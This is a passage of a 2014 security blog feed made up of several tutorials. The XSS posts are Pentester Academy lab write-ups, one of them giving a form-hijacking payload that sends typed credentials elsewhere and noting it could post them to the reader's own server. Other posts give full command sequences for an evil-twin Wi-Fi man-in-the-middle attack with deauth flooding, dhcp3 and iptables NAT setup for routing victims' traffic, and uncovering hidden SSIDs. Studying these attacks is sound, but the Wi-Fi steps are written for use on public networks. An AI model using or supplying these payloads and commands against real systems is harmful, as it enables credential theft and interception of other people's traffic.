class="nx">onsubmit</span> <span class="o">=</span> <span class="nx">intercept</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Lets see how it works. It will select the form we need with <strong>document.forms[0] </strong>and will add an onsubmit event to it which will trigger a function called intercept when submit action takes place. Inside the <strong>intercept</strong> function, we are saving the username:password that user entered to 2 new variables namely user:pass by accessing form elements. Then I used the <strong>window.location.replace </strong>which works like an HTTP redirect will actually redirect the user to a new page with the credentials entered by the user.</p> <p>In above payload, I am redirecting user to <a href="http://pentesteracademylab.appspot.com/lab/webapp/1">Pentester Academy WAP challenge 1: Form Bruteforce</a> link and will submit the username:password to it. As you can see from my write about the same <a href="#">WAP Challenge,</a> you can know that the username:password  combination for WAP challenge 1 is <code class="language-plaintext highlighter-rouge">admin@pentesteracademy.com:zzzxy</code>. After injecting the above payload into the task 3 via URL parameter, if you enter the credentials as <code class="language-plaintext highlighter-rouge">admin@pentesteracademy.com:zzzxy</code>, it will redirect you to WAP challenge 1 success web page and shows that challenge has been successfully completed.</p> <p><strong>Note:</strong></p> <p>1) I did the above redirection just for a fun part. You can modify the payload so that the user entered credentials could be saved to your server.</p> <p>2) You have to <a href="http://meyerweb.com/eric/tools/dencoder/">URL encode</a> the payload before the injection via the url parameter or else this will fail to work (I spend a huge time figuring out why the payload is not working, the reason was I was not encoding before injecting it)</p> <p>3) It is always recommended to try out the challenge in Mozilla FireFox and not in Google chrome because chrome has an inbuilt XSS Auditor which will stop the payload from executing.</p> <p>4) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to <a href="http://pentesteracademy.com/"><strong>PentesterAcademy</strong></a>.</p> Thu, 23 Oct 2014 00:23:22 -0700 https://blog.0daylabs.com/2014/10/23/xss-hijacking-form-submit-js-pentesters-task-3-write/ https://blog.0daylabs.com/2014/10/23/xss-hijacking-form-submit-js-pentesters-task-3-write/ jsp javascript security-tube xss Changing all links: JavaScript for Pentesters task 2 write up <p>Pentester Academy has a wonderful list of JavaScript challenges which will help us learn XSS by cracking through different sets of questions with varying difficulty. We have already covered the first challenge namely <a href="https://blog.0daylabs.com/2014/10/20/modifying-html-javascript-javascript-pentesters-task-1/">Modifying HTML with JavaScript – JavaScript for Pentesters task 1</a>. Now let us see how can we crack the 2nd challenge. The question is as follows:</p> <p>** <a href="http://pentesteracademylab.appspot.com/lab/webapp/jfp/2">JavaScript for Pentesters task 2</a>**</p> <p>There are a number of links given in the page (4 links to be precise). The objective is to change all the Links on that page to “http://PentesterAcademy.com/topics”. As always, like a Pentester, we should be <strong>systematic</strong> in trying to attack a target. So first lets us figure out if it is vulnerable to XSS. As always, lets try injecting an alert payload:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">XSS</span><span class="dl">"</span><span class="p">)</span><span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>As you can see, it will give you a pop up and yea, we have confirmed that the page is vulnerable to XSS. The next thing is to check out the page source code from which we can identify all the link attributes which we should modify. We can see that there are 4 links in total and we need to modify all of them so that it points to “http://pentesteracademy.com/topics”.</p> <p>As shown in the source code, we have 4 links to modify. To modify an <code class="language-plaintext highlighter-rouge">&lt;a&gt;</code> tag we can use <code class="language-plaintext highlighter-rouge">getElementByTagName("a")</code> and then modify the corresponding href tags to the link that we want. The above command will return a list of all <code class="language-plaintext highlighter-rouge">&lt;a&gt;</code> tags present in the documents. Then we can use <code class="language-plaintext highlighter-rouge">link.href = "URL"</code>. Since we have more than 1 link to be changed, we have to use a for loop so that all the links can be modified at once. The entire payload looks like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">links</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">a</span><span class="dl">"</span><span class="p">);</span> <span class="k">for</span><span class="p">(</span><span class="nx">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">i</span><span class="o">&lt;</span><span class="nx">links</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span><span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="nx">links</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Pentester Academy link </span><span class="dl">"</span> <span class="o">+</span> <span class="p">[</span><span class="nx">i</span><span class="p">];</span> <span class="nx">links</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">http://PentesterAcademy.com/topics</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>You can copy the entire payload above and try to inject it. This will modify 2 things:</p> <p>1) It will modify all the URL’s and will point it to “http://pentesteracademy.com/topics”</p> <p>2) it will change the <strong>innerHTML</strong> of <strong>href</strong> tag and modify it to strings like <strong>Pentester Academy link 0</strong> , Pentester Academy link 1 etc..</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to <a href="http://pentesteracademy.com/"><strong>PentesterAcademy</strong></a>.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand, wanted to get more clarity or if there is a better way to complete this challenge, please comment down and we are more than happy to help. Happy Pentesting..</p> Tue, 21 Oct 2014 07:29:04 -0700 https://blog.0daylabs.com/2014/10/21/changing-href-links-using-js-javascript-pentesters-task-2/ https://blog.0daylabs.com/2014/10/21/changing-href-links-using-js-javascript-pentesters-task-2/ jsp javascript security-tube xss Modifying HTML with JavaScript - JavaScript for Pentesters task 1 write up <p>The objectives of the challenge was:</p> <p>1) Modify the text “Modify me” to “Modified you” 2) Modify the text “Find me” to “Found you”</p> <p>The very first thing a pentester should follow is to be <strong>systematic</strong> while doing a pentesting. Don’t quickly jump of with several payloads before carefully analyzing the conditions. In the challenge, the first thing is to check if it is  vulnerable to XSS. So lets try a basic payload to test it:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;script&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">XSS</span><span class="dl">"</span><span class="p">)</span><span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>When you click submit, you can see an alert box which displays the string “XSS” which means we can execute arbitrary JavaScript code on the page. The next thing is to complete the first task, i.e, <strong>Modify the text “Modify me” to “Modified you” </strong>. So let us see the source code to analyse what kind of text it is or if the text has an associated html id (then things would have been much easier). When you see the source code, you will come across this part:</p> <p>As you can see, the text “Modify me” is inside an <strong>h2</strong> tag. Also you can see that there are 2 blind (without any contents) h2 tags above, which means our <strong>h2</strong> tag is in the 3rd position. Now our aim is to modify the HTML inside the 3rd <strong>h2 </strong>tag. The best way to change the innerHTML of any tags is to use the getElementsByTagName followed by change in the innerHTML:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;script&gt;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">h2</span><span class="dl">"</span><span class="p">)[</span><span class="mi">2</span><span class="p">].</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Modified you</span><span class="dl">"</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>The <code class="language-plaintext highlighter-rouge">getElementsByTagName</code> returns a list of all the objects under a particular tag name. <code class="language-plaintext highlighter-rouge">getElementsByTagName("h2")</code> will return a list of all the different elements inside a particular webpage. In this challenge case, we need to modify the 3rd h2 tag which means the 2nd element of the array. So we modified the payload a bit to select the 2nd element: <code class="language-plaintext highlighter-rouge">getElementsByTagName("h2")[2]</code>. Now this will select the 3rd h2 tag in order to modify the HTML inside the tag, we use <strong>innerHTML</strong>.</p> <p>The 2nd task is to Modify the text “Find me” to “Found you”. If you check the source code again, you can see that there is only one <strong>h1</strong> tag in the entire document, which makes our work much easier. In order to modify it, we will add one more line to the above code and the payload will be like this:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;script&gt;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">h2</span><span class="dl">"</span><span class="p">)[</span><span class="mi">2</span><span class="p">].</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Modified you</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementsByTagName</span><span class="p">(</span><span class="dl">"</span><span class="s2">h1</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Found you</span><span class="dl">"</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span></code></pre></figure> <p>Since there is only one <strong>h1</strong> tag, we use [0] to select the first one. Using this payload, you can successfully complete the challenge.</p> <p><strong>Note:</strong></p> <p>1) While playing with <strong>XSS challenges</strong>, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.</p> <p>2) The solutions written above is the way we cracked the problem which might be different from the solution videos provided by the SecurityTube. If you need the solution video, you have to subscribe to <a href="http://pentesteracademy.com"><strong>PentesterAcademy</strong></a>.</p> <p>We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Happy pentesting..</p> Mon, 20 Oct 2014 08:47:06 -0700 https://blog.0daylabs.com/2014/10/20/modifying-html-javascript-javascript-pentesters-task-1/ https://blog.0daylabs.com/2014/10/20/modifying-html-javascript-javascript-pentesters-task-1/ jsp javascript security-tube xss Enforce SSL with JavaScript: Forcing browser to use "https:" <p>Usually people don’t care about the protocol they use to visit a website. Some websites like Facebook or Google+ will redirect you automatically to <strong>SSL/TLS</strong> encryption (<strong>https://</strong>) rather than using HTTP. The reason is because the SSL encryption will provide added security to your website and it will help us in blocking people  from spying us especially when we are on a public WiFi. For example, if we are using HTTP over a public network, other people can easily spy you with sniffer tools like <strong>WireShark</strong>. But if we are using an HTTPS protocol, even though people can still sniff with WireShark, there will be nothing useful in the packets as all the packets will be encrypted and protected with <strong>SSL/TLS</strong> encryption. So, to an extend you are safe.</p> <p>So consider you have a website and you need to force redirect all “http:” traffic to “<strong>https:”</strong>. How can you do that ? The easiest way is to add the following code to your HTML head section of the root document (may be index.html ?  )</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">protocol</span> <span class="o">!=</span> <span class="dl">"</span><span class="s2">https:</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">https:</span><span class="dl">"</span> <span class="o">+</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">protocol</span><span class="p">.</span><span class="nx">length</span><span class="p">);</span> <span class="p">}</span></code></pre></figure> <p>The above code will force/redirect your browser to use “https:” if it is not already using. So lets see what this code does. First, it will check for the current protocol to see whether its using “https:” or not. <strong>Window.location.protocol </strong>will return the current protocol that we use. So we will check if it is equal to “https:”. If not, we will redirect the browser to the same URL with the protocol being changed to “https:”.</p> <p><strong>Note:</strong></p> <p>In the above code, we didn’t use document.location and used window.location because window.location is more cross browser compatible. Even though now, all the browsers support document.location, people using old browsers will get compatibility issues. Since window.location works on all browsers, just to be on safe side, we used it.</p> <p>Source: <a href="stackoverflow.com/questions/4723213/detect-http-or-https-then-force-https-in-javascript">Stackoverflow</a></p> Sun, 19 Oct 2014 23:56:06 -0700 https://blog.0daylabs.com/2014/10/19/enforce-ssl-with-javascript/ https://blog.0daylabs.com/2014/10/19/enforce-ssl-with-javascript/ javascript Metadata mining: Dont let them follow your breadcrumbs ! <p><strong>Metadata</strong> means the data about the data. That sounds too weird ? Ooh well, it can be simply considered as a very small file which stores information about a big file. Oops, now that’s strange.. A file info saved in another file (now that goes into an infinite loop doesn’t it ) ? For the purpose of understanding, metadata is the section of the file that describes what the file is, providing additional information that is generally not directly visible to the user. Usually when a file is created several informations like “last modified”, “Author who modified” etc… are saved within the file as metadata. For example an image file usually contains meta information like “Width”, “Height”, “Resolution”, “Compression” etc. So what is the risk of being adding a little more info about the file ? Let us analyse it.</p> <p>The Metadata inside an image file may not be much useful to the attackers (There were situations when an Anonymous hacker named w0rmer from the team <strong>CabinCr3w</strong> got caught by the police when they got his GPS coordinates from the image he uploaded) but metadata has more meaning than simply file properties. Consider a developer designing a website for a client and chances are high that he will add meaningful comments into the code so that the client can understand it better. But are the comments useful only for the client ? Lets us take a piece of code and analyse this (code sample taken from <a href="https://www.owasp.org/index.php/Testing_Review_webpage_comments_and_metadata(OWASP-IG-007)">OWASP</a>):</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"> <span class="o">&lt;</span><span class="nx">div</span> <span class="kd">class</span><span class="o">=</span><span class="dl">"</span><span class="s2">table2</span><span class="dl">"</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="kd">class</span><span class="o">=</span><span class="dl">"</span><span class="s2">col1</span><span class="dl">"</span><span class="o">&gt;</span><span class="mi">1</span><span class="o">&lt;</span><span class="sr">/div&gt;&lt;div class="col2"&gt;Mary&lt;/</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="kd">class</span><span class="o">=</span><span class="dl">"</span><span class="s2">col1</span><span class="dl">"</span><span class="o">&gt;</span><span class="mi">2</span><span class="o">&lt;</span><span class="sr">/div&gt;&lt;div class="col2"&gt;Peter&lt;/</span><span class="nx">div</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="kd">class</span><span class="o">=</span><span class="dl">"</span><span class="s2">col1</span><span class="dl">"</span><span class="o">&gt;</span><span class="mi">3</span><span class="o">&lt;</span><span class="sr">/div&gt;&lt;div class="col2"&gt;Joe&lt;/</span><span class="nx">div</span><span class="o">&gt;</span> <span class="c">&lt;!--</span> <span class="nx">Query</span><span class="p">:</span> <span class="nx">SELECT</span> <span class="nx">id</span><span class="p">,</span> <span class="nx">name</span> <span class="nx">FROM</span> <span class="nx">app</span><span class="p">.</span><span class="nx">users</span> <span class="nx">WHERE</span> <span class="nx">active</span><span class="o">=</span><span class="dl">'</span><span class="s1">1</span><span class="dl">'</span> <span class="o">--&gt;</span> <span class="o">&lt;</span><span class="sr">/div&gt;</span></code></pre></figure> <p>Did you see any issues in the above code ? You can see a comment which exposes how the data is taken from the database. An attacker can easily understand the code and can try an SQLinjection to get un-Authorized access to the database.</p> <p>So what is the best possible way to avoid attackers from mining your metadata ? The answer is simple as you might have thought. Just don’t comment or put any information on the code that you write or make sure you remove the comments and other useless things from the source code before you deploy it. But if you had already deployed hundreds of pages, going through all of them manually and removing the comments is not possible. <strong><a href="http://www.alentum.com/ahc/">Absolute HTML compressor</a> </strong>comes to the rescue here. This small tool can automate the process of removing the comments from your source code.</p> Wed, 01 Oct 2014 03:18:09 -0700 https://blog.0daylabs.com/2014/10/01/metadata-mining-dont-let-follow-breadcrumbs/ https://blog.0daylabs.com/2014/10/01/metadata-mining-dont-let-follow-breadcrumbs/ pentest Configuring dhcp3 for man in the middle attacks ! <p>Recently we have seen the <strong><a href="https://blog.0daylabs.com/2014/09/28/man-in-the-middle-attack-using-evil-twins-in-kali-linux/">Evil twins</a></strong>_ method to do a man in the middle attack. But **<a href="https://blog.0daylabs.com/2014/09/28/man-in-the-middle-attack-using-evil-twins-in-kali-linux/">Evil twins</a> **_attack is only complete if we can configure the dhcp services on our machine. Now why is that so ? Well, consider you saw a Wi-Fi named “Public Wi-Fi”. Once you try to establish a connection with it, it will be only completed if it can assign an ip address to your PC.</p> <p>Similarly, once you create an <a href="https://blog.0daylabs.com/2014/09/28/man-in-the-middle-attack-using-evil-twins-in-kali-linux/"><strong>Evil twin</strong></a>, you also have to configure the dhcp services on your machine so that once the victim connects to it, he will be automatically assigned an ip address and gateway. If you have a wired internet connection (eth0) , then you can use dhcp services to route the victim’s original packets to internet. Then the victim will never come to know that we have played a man in the middle attack. Configuring dhcp3 for man in the middle attacks :</p> <p>1) First, Install dhcp3. For that use the command :</p> <p><code class="language-plaintext highlighter-rouge">sudo apt-get install dhcp-server</code></p> <p>This will install dhcp server to your machine. Now we have to configure the dhcp3.</p> <p>2) Open the configuration file:</p> <p><code class="language-plaintext highlighter-rouge">sudo vim /etc/dhcp3/dhcpd.conf</code></p> <p>This will open the configuration file in vim (you can use any text editor you want). Make sure you keep a backup of the configuration file before making the changes (in case if you want to reset it ). Now add the following piece of information to it.</p> <p><code class="language-plaintext highlighter-rouge">ddns-update-style ad-hoc;</code></p> <p><code class="language-plaintext highlighter-rouge">default-lease-time 600;</code></p> <p><code class="language-plaintext highlighter-rouge">max-lease-time 7200;</code></p> <p><code class="language-plaintext highlighter-rouge">subnet 192.168.2.0 netmask 255.255.255.0 {</code></p> <p><code class="language-plaintext highlighter-rouge">option subnet-mask 255.255.255.0;</code></p> <p><code class="language-plaintext highlighter-rouge">option broadcast-address 192.168.2.255;</code></p> <p><code class="language-plaintext highlighter-rouge">option routers 192.168.2.1;</code></p> <p><code class="language-plaintext highlighter-rouge">option domain-name-servers 8.8.8.8;</code></p> <p><code class="language-plaintext highlighter-rouge">range 192.168.2.100 192.168.2.175; }</code></p> <p>3) Then save the file and there, the configuration file is ready to use. Now we have to route the configuration so that victims connected will automatically get assigned by an ip address. Before that, you can create the Evil twin. You can <a href="https://blog.0daylabs.com/2014/09/28/man-in-the-middle-attack-using-evil-twins-in-kali-linux/">read about the Evil Twins here</a>.</p> <p>4) After creating an Evil twin, we have a new interface called <em><strong>at0</strong></em>. Now we have to assign our ip to <em><strong>at0</strong></em>. For that use the command :</p> <p><code class="language-plaintext highlighter-rouge">ifconfig at0 192.168.2.1/24</code></p> <p><code class="language-plaintext highlighter-rouge">route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1</code></p> <p>The above command will make sure the routing will be successful. Now we have to start the dhcp3 services :</p> <p><code class="language-plaintext highlighter-rouge">sudo dhcp3d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0</code></p> <p><code class="language-plaintext highlighter-rouge">sudo /etc/init.d/dhcp3-server start</code></p> <p>The above commands will start the dhcp3 services on_** at0.**_</p> <p>5) Now we have route the Incoming traffic from the victim at <em><strong>at0</strong> _to ethernet connection _<strong>eth0</strong></em>. To do that, we have to use the <em><strong>Network Address Translation (NAT)</strong></em>. Use the following commands one by one : <code class="language-plaintext highlighter-rouge">iptables --flush</code></p> <p><code class="language-plaintext highlighter-rouge">iptables --table nat --flush</code></p> <p><code class="language-plaintext highlighter-rouge">iptables --delete-chain</code></p> <p><code class="language-plaintext highlighter-rouge">iptables --table nat --delete-chain</code></p> <p><code class="language-plaintext highlighter-rouge">iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE</code></p> <p><code class="language-plaintext highlighter-rouge">iptables --append FORWARD --in-interface at0 -j ACCEPT</code></p> <p><code class="language-plaintext highlighter-rouge">echo 1 &gt; /proc/sys/net/ipv4/ip_forward</code></p> <p>That’s it. We have successfully routed the <em><strong>at0</strong></em> traffic to <em><strong>eth0</strong></em>.</p> <p>The next question is how can we know that some one is doing a man in the middle attack while we are browsing on public Wi-Fi ?? The best way is to take a traceroute. <em><strong>Traceroute</strong></em> will show through what all networks and places, your packets are going before reaching the destination. That’s how you can understand whether some one is doing a man in the middle attack.</p> <p>NOTE: </p> <ul> <li> <p>While configuring the <em><strong>DHCP3</strong></em> my <em><strong>eth0</strong></em> address was 192.168.1.1. Thats why I configured  <em><strong>at0</strong></em><strong> </strong>with 192.168.2.1.</p> </li> <li> <p>If your IP range is different, do make changes accordingly.</p> </li> </ul> Sun, 28 Sep 2014 01:57:08 -0700 https://blog.0daylabs.com/2014/09/28/configuring-dhcp3-man-middle-attacks/ https://blog.0daylabs.com/2014/09/28/configuring-dhcp3-man-middle-attacks/ kali-linux Man in the Middle attack using Evil twins in Kali-Linux ! <p><strong>Man in the middle attacks (MITM)</strong> are one of the easiest ways in which an attacker can steal user credentials from the victim. What basically attacker does is that, he will establish a connection with the victim somehow and will route the victim’s traffic through him. Now the attacker can analyse the packets send by the victim to steal his credentials and other valuable things. One of the most common ways to do it is to use ettercap or _<strong>Evil twin</strong>’s attack in Kali-Linux. We will see how can we use <strong>Evil twin</strong> attack here.</p> <p>In practical cases, when your PC scans for available Wi-Fi networks, if there are 2 networks with same SSID’s (or same name) , then the PC will display only 1 which has stronger signal to your Wi-Fi card. This means that, if we are nearer to the victim than the router, then we can create a Wi-Fi hotspot with the same name and the victim’s PC will automatically connect to us. Then we can use the <strong>DHCP3</strong> to route the traffic to Internet from our PC. So the victim will never come to know that we are playing in between him and the internet. Creating the <em><strong>Evil twin</strong></em> of the real <a href="https://blog.0daylabs.com/2014/09/28/find-hidden-ssids-using-backtrackkali-linux/">SSID</a> will do the trick, hence the name evil twin attack. Lets see how we can do man in the middle attack using evil twins :</p> <p>1) Create an <strong>airmon-ng</strong> monitoring interface. Use this command to do that:</p> <p><code class="language-plaintext highlighter-rouge">sudo airmon-ng start wlan0</code></p> <p>This will start a monitoring mode normally mon0 or mon1. Now we need to dump the results of the monitoring to our terminal.</p> <p>2) To dump the results, we use <strong>airodump-ng</strong>:</p> <p><code class="language-plaintext highlighter-rouge">sudo airodump-ng mon0</code></p> <p>This will show lots of info’s on your terminal like available Wi-Fi networks, channels, users, Mac-address etc. Now from the list , for example, if there is a hotspot named “Public Wi-Fi”, we need to create its evil twin.</p> <p>3) To do that, we use <strong>airbase-ng</strong>:</p> <p><code class="language-plaintext highlighter-rouge">sudo airbase-ng --essid "Public Wi-Fi" -c 1 mon0</code></p> <p>Now this will start a new hotspot with the name “Public Wi-Fi” the evil twin of the real one. Now what we do is, send Deauth attack to the real Wi-Fi network so that all users connected to it will get disconnected and join to our evil twin.</p> <p>4) To do a <strong>deauth</strong> attack, we use :</p> <p><code class="language-plaintext highlighter-rouge">sudo aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX mon0</code></p> <p>Now this will keep on giving deauth attack to the router until we press <em><strong>ctrl+c</strong></em>. <em><strong>XX:XX:XX:XX:XX:XX</strong></em> is the mac-address of the router. So if we keep up the deauth attack , say for 20 secs, that’s enough for users to get disconnected and reconnect to our evil twin network. Thats it. We got the victim connected to our PC.</p> <p>Now you can configure DHCP3 to route the packets to the Internet or you can use Social Engineering Toolkit in Kali-Linux to steal passwords. You can also use Wireshark to do the same. Sometimes, for security reasons the SSID’s will be hidden or the network will be filtered using Mac-address. If so you can read the posts on <a href="https://blog.0daylabs.com/2014/09/28/bypass-mac-address-filtering-using-backtrackkali-linux/">how to bypass Mac-address filters</a> and <a href="https://blog.0daylabs.com/2014/09/28/find-hidden-ssids-using-backtrackkali-linux/">how can you find out Hidden SSID’s using Kali-Linux</a>.</p> Sun, 28 Sep 2014 00:00:00 -0700 https://blog.0daylabs.com/2014/09/28/man-in-the-middle-attack-using-evil-twins-in-kali-linux/ https://blog.0daylabs.com/2014/09/28/man-in-the-middle-attack-using-evil-twins-in-kali-linux/ kali-linux [How to] Find out Hidden SSIDs using Backtrack/Kali Linux <p>In the last article, we saw <a href="https://blog.0daylabs.com/2014/09/28/enabling-ssh-connectivity-backtrackkali-linux/">how can we enable ssh in Backtrack/Kali Linux</a> so that we can control it remotely without physically present before the system. Also we have covered the basic networking techniques in <strong>Backtrack/Kali</strong>. Now let us move to different kinds of attacks, how it works and how can we stop it.</p> <p>In this article, we will teach you how to discover SSIDs that is hidden from normal views. <strong>SSIDs (Service Set identifier)</strong> is nothing but the network name that we give during the configuration of the router or Access point. For security reasons sometimes people may hide it while configuring Access points to avoid normal people from accessing it. So let us see how can we find out such a hidden network. To find this out, we will use 3 inbuilt tools from Backtrack/Kali namely <strong>airmon-ng</strong>, <strong>airodump-ng</strong>, <strong>aireplay-ng</strong>.</p> <p>First, we have to mon­i­tor the wire­less card. For that we use <strong>airmon-ng</strong>. Open up a new terminal and give this command:</p> <p><code class="language-plaintext highlighter-rouge">sudo airmon-ng</code></p> <p>This should list all the interfaces(both wired and wireless) like on the screen shot. Now lets start monitoring by giving the command :</p> <p><code class="language-plaintext highlighter-rouge">sudo airmon-ng start wlan0</code></p> <p>This will begin a monitoring service normally called mon0 (check out the screen shot). Now we have to dump the information collected by this monitoring. In order to do this, we will use** airodump-ng**. Give the command :</p> <p><code class="language-plaintext highlighter-rouge">sudo airodump-ng mon0</code></p> <p>This will show all the <strong>SSID’s</strong> available in the network. Here, in the screen shot, I have not included any hidden SSID’s as I haven’t created any. If there are any hidden SSID’s, it will show names similar to this:</p> <p><img src="/images/2014/Airomon.jpg" alt="Airomon in action" /></p> <p>But here, let us consider <strong>ACCS-Student</strong> shown on the screen shot is hidden. You can understand from the screen shot that all of the wifi that I have used is working on <strong>channel 11</strong>. Normally it won’t be like this but here, in this special case all wifi’s are on same channel. So now lets us give the next command :</p> <p><code class="language-plaintext highlighter-rouge">airodump-ng -c 11 mon0</code></p> <p>This command will dump info about the <strong>SSID’s</strong> working on that specific channel. Now you can do 2 things:</p> <p>You can wait till a user who knows about this hidden <strong>SSID</strong> to connect himself to that network while we are monitoring and the same will produce the SSID name on your screen. So what if, you don’t want to wait ?? You can do a <strong>Deauth attack</strong> on the SSID. That will disconnect all the users who are using the network. That will force them to rejoin while we are monitoring and we will easily get the SSID. <strong>Deauth attack</strong> command is :</p> <p><code class="language-plaintext highlighter-rouge">aireplay-ng -0 3 -a mac-address-of-hidden-SSID mon0</code></p> <p>This will sent a <strong>Deauth notification</strong> exactly 3 times to the SSID which will result in disconnection of all users currently using it. That will make them rejoin soon and that will get our SSID. Once you get the <strong>SSID</strong> you can tell the BackTrack/Kali Linux to associate with it by giving the command (Consider the hidden SSID we found out was <strong>ACCS-Student</strong>  :</p> <p><code class="language-plaintext highlighter-rouge">iwconfig wlan0 essid ACCS-Student channel 11</code></p> <p><strong>NOTE:</strong></p> <ul> <li> <p>Sending a <strong>Deauth attack</strong> may not work sometimes. It depends on so many factors. But in almost all cases it will work.</p> </li> <li> <p>This article is for education purposes only. It is not recommended to use these attacks illegally over public networks.</p> </li> </ul> Sun, 28 Sep 2014 00:00:00 -0700 https://blog.0daylabs.com/2014/09/28/find-hidden-ssids-using-backtrackkali-linux/ https://blog.0daylabs.com/2014/09/28/find-hidden-ssids-using-backtrackkali-linux/ kali-linux [How to] Enabling ssh connectivity in Backtrack/Kali Linux <p><strong>Backtrack/Kali </strong> is the most advanced Linux based penetration testing distribution till date. It contains pre-installed tools from Information gathering to advanced <strong>wireless attacks</strong> and <strong>Forensics</strong>. We are launching a series of tutorials that will start from the basics and will cover the most advanced attacks with Backtrack/Kali.</p> <p>Let us first enable <strong>ssh</strong> connectivity on Backtrack/Kali. By default, <strong>ssh</strong> connectivity will not be enabled. We have to enable it manually. Now lets us see how can we do that. Before making our system able to receive ssh, we should first <strong>create/Generate ssh private and public key.</strong> Generating these keys are very simple. Just use the command</p> <p><code class="language-plaintext highlighter-rouge">sshd -generate</code></p> <p>And the Backtrack/Kali will automatically create it for you. After creating the keys, we have to tell the backtrack/Kali to accept ssh connections. To do that, use either one of the following command:</p> <p><code class="language-plaintext highlighter-rouge">/etc/init.d/ssh start or start ssh</code></p> <p>(It is always better to use the first command as I have heard people complaining that the second command is simply not working.) Now you have successfully taught Backtrack/Kali to accept ssh connection. But still there is a problem. Once you reboot the system, it will forget these settings. In other words, you are enabling ssh temporarily and once system reboots, it will forget all the settings.</p> <p>So what should we do so that it will remember these settings forever ? Use the following command to update and permanently store the ssh settings :</p> <p><code class="language-plaintext highlighter-rouge">update-rc.d -f ssh defaults</code></p> <p>So you will be wondering what this command will do? Basically what it does is, it will over write the default ssh settings to the new one you just did. So this will ensure that your the changes will be permanent and will not perish if system reboots.</p> <p><strong>Note:</strong></p> <p>While enabling <strong>ssh</strong>, you should make sure that your system users has really strong <strong>alpha - numeric</strong> passwords especially root user. It is because an attacker can do a brute force attack over ssh and if your password is not strong enough, he can break it and can cause system damage or theft of your precious data.</p> Sun, 28 Sep 2014 00:00:00 -0700 https://blog.0daylabs.com/2014/09/28/enabling-ssh-connectivity-backtrackkali-linux/ https://blog.0daylabs.com/2014/09/28/enabling-ssh-connectivity-backtrackkali-linux/ Kali-Linux [How to] Bypass Mac address filtering using Backtrack/Kali Linux <p>In the last tutorial, we saw  How can we find out the hidden <strong>SSID’s</strong> using Backtrack/Kali linux. After we found out the <strong>SSID</strong> we were also able to connect to the network. But what if the network is using a Mac address filter to block un-Authorised access? Mac Address Filtering is used commonly now-a-days in schools, colleges, offices etc to prevent externals users from using it. But is it a highly secured method? The answer is no. It is very easy to bypass a Mac 